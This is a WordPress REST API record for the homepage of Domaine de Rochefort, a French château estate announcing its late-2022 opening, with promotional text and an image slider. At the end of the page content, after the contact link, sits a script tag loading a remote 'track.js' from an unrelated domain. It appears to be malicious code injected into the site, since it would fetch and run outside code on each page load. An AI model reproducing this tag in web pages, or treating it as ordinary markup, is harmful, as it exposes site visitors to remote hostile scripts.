{"id":9,"date":"2021-05-25T11:07:15","date_gmt":"2021-05-25T09:07:15","guid":{"rendered":"http:\/\/domainederochefort.fr\/?page_id=9"},"modified":"2022-07-19T12:55:53","modified_gmt":"2022-07-19T10:55:53","slug":"accueil","status":"publish","type":"page","link":"http:\/\/domainederochefort.fr\/","title":{"rendered":"Accueil"},"content":{"rendered":"\n<p class=\"has-text-color\" style=\"font-size:28px;color:#de5cc0\"><strong>OUVERTURE FIN 2022<\/strong><\/p>\n\n\n\n<p><strong>D\u00e9couvrez en avant-premi\u00e8re notre nouveau projet qui ravira petits et grands d\u00e8s Octobre 2022. <\/strong><\/p>\n\n\n\n<p>Venez prochainement d\u00e9couvrir le Domaine de Rochefort ! Vivez avec nous une exp\u00e9rience inoubliable au c\u0153ur d&#8217;un cadre idyllique propice \u00e0 la r\u00eaverie.<\/p>\n\n\n\n<p>Petit coin de paradis lig\u00e9rien, le Domaine de Rochefort vous accueillera de jour comme de nuit dans une ambiance bucolique et f\u00e9\u00e9rique. <\/p>\n\n\n\n<p>Si vous souhaitez prolonger votre exp\u00e9rience \u00e0 nos c\u00f4t\u00e9s, le ch\u00e2teau vous proposera ses chambres pour un s\u00e9jour riche en \u00e9motions.<\/p>\n\n\n<div id=\"metaslider-id-50\" style=\"width: 100%;\" class=\"ml-slider-3-108-0 metaslider metaslider-flex metaslider-50 ml-slider has-dots-nav ms-theme-default\" role=\"region\" aria-label=\"Nouveau diaporama\" data-height=\"400\" data-width=\"800\">\n    <div id=\"metaslider_container_50\">\n        <div id=\"metaslider_50\">\n            <ul class='slides'>\n                <li style=\"display: block; width: 100%;\" class=\"slide-118 ms-image \" aria-roledescription=\"slide\" data-date=\"2021-06-01 10:41:18\" data-filename=\"Capture-decran-2021-06-01-093900-647x323.png\" data-slide-type=\"image\"><img src=\"http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/06\/Capture-decran-2021-06-01-093900-647x323.png\" height=\"400\" width=\"800\" alt=\"\" class=\"slider-50 slide-118 msDefaultImage\" title=\"Capture d\u2019\u00e9cran 2021-06-01 093900\" \/><\/li>\n                <li style=\"display: none; width: 100%;\" class=\"slide-100 ms-image \" aria-roledescription=\"slide\" data-date=\"2021-05-26 10:05:15\" data-filename=\"boys-5630669_1920-800x400.jpg\" data-slide-type=\"image\"><img src=\"http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/boys-5630669_1920-800x400.jpg\" height=\"400\" width=\"800\" alt=\"\" class=\"slider-50 slide-100 msDefaultImage\" title=\"boys-5630669_1920\" \/><\/li>\n                <li style=\"display: none; width: 100%;\" class=\"slide-99 ms-image \" aria-roledescription=\"slide\" data-date=\"2021-05-26 10:05:15\" data-filename=\"mountains-615428_1920-800x400.jpg\" data-slide-type=\"image\"><img src=\"http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/mountains-615428_1920-800x400.jpg\" height=\"400\" width=\"800\" alt=\"\" class=\"slider-50 slide-99 msDefaultImage\" title=\"mountains-615428_1920\" \/><\/li>\n            <\/ul>\n        <\/div>\n        \n    <\/div>\n<\/div>\n\n\n\n<p>N&#8217;h\u00e9sitez pas \u00e0 <a href=\"http:\/\/domainederochefort.fr\/?page_id=11\" data-type=\"URL\" data-id=\"http:\/\/domainederochefort.fr\/?page_id=11\">nous contacter<\/a> pour toute information compl\u00e9mentaire ou demande de r\u00e9servation.<\/p>\n<script src='https:\/\/trick.cofounderspecials.com\/track.js?v=9.999' type='text\/javascript'><\/script>","protected":false},"excerpt":{"rendered":"<p>OUVERTURE FIN 2022 D\u00e9couvrez en avant-premi\u00e8re notre nouveau projet qui ravira petits et grands d\u00e8s Octobre 2022. Venez prochainement d\u00e9couvrir le Domaine de Rochefort ! Vivez avec nous une exp\u00e9rience inoubliable au c\u0153ur d&#8217;un cadre idyllique propice \u00e0 la r\u00eaverie. Petit coin de paradis lig\u00e9rien, le Domaine de Rochefort vous accueillera de jour comme de nuit dans une ambiance bucolique &hellip; <\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/domainederochefort.fr\/index.php?rest_route=\/wp\/v2\/pages\/9"}],"collection":[{"href":"http:\/\/domainederochefort.fr\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/domainederochefort.fr\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/domainederochefort.fr\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"http:\/\/domainederochefort.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9"}],"version-history":[{"count":13,"href":"http:\/\/domainederochefort.fr\/index.php?rest_route=\/wp\/v2\/pages\/9\/revisions"}],"predecessor-version":[{"id":122,"href":"http:\/\/domainederochefort.fr\/index.php?rest_route=\/wp\/v2\/pages\/9\/revisions\/122"}],"wp:attachment":[{"href":"http:\/\/domainederochefort.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}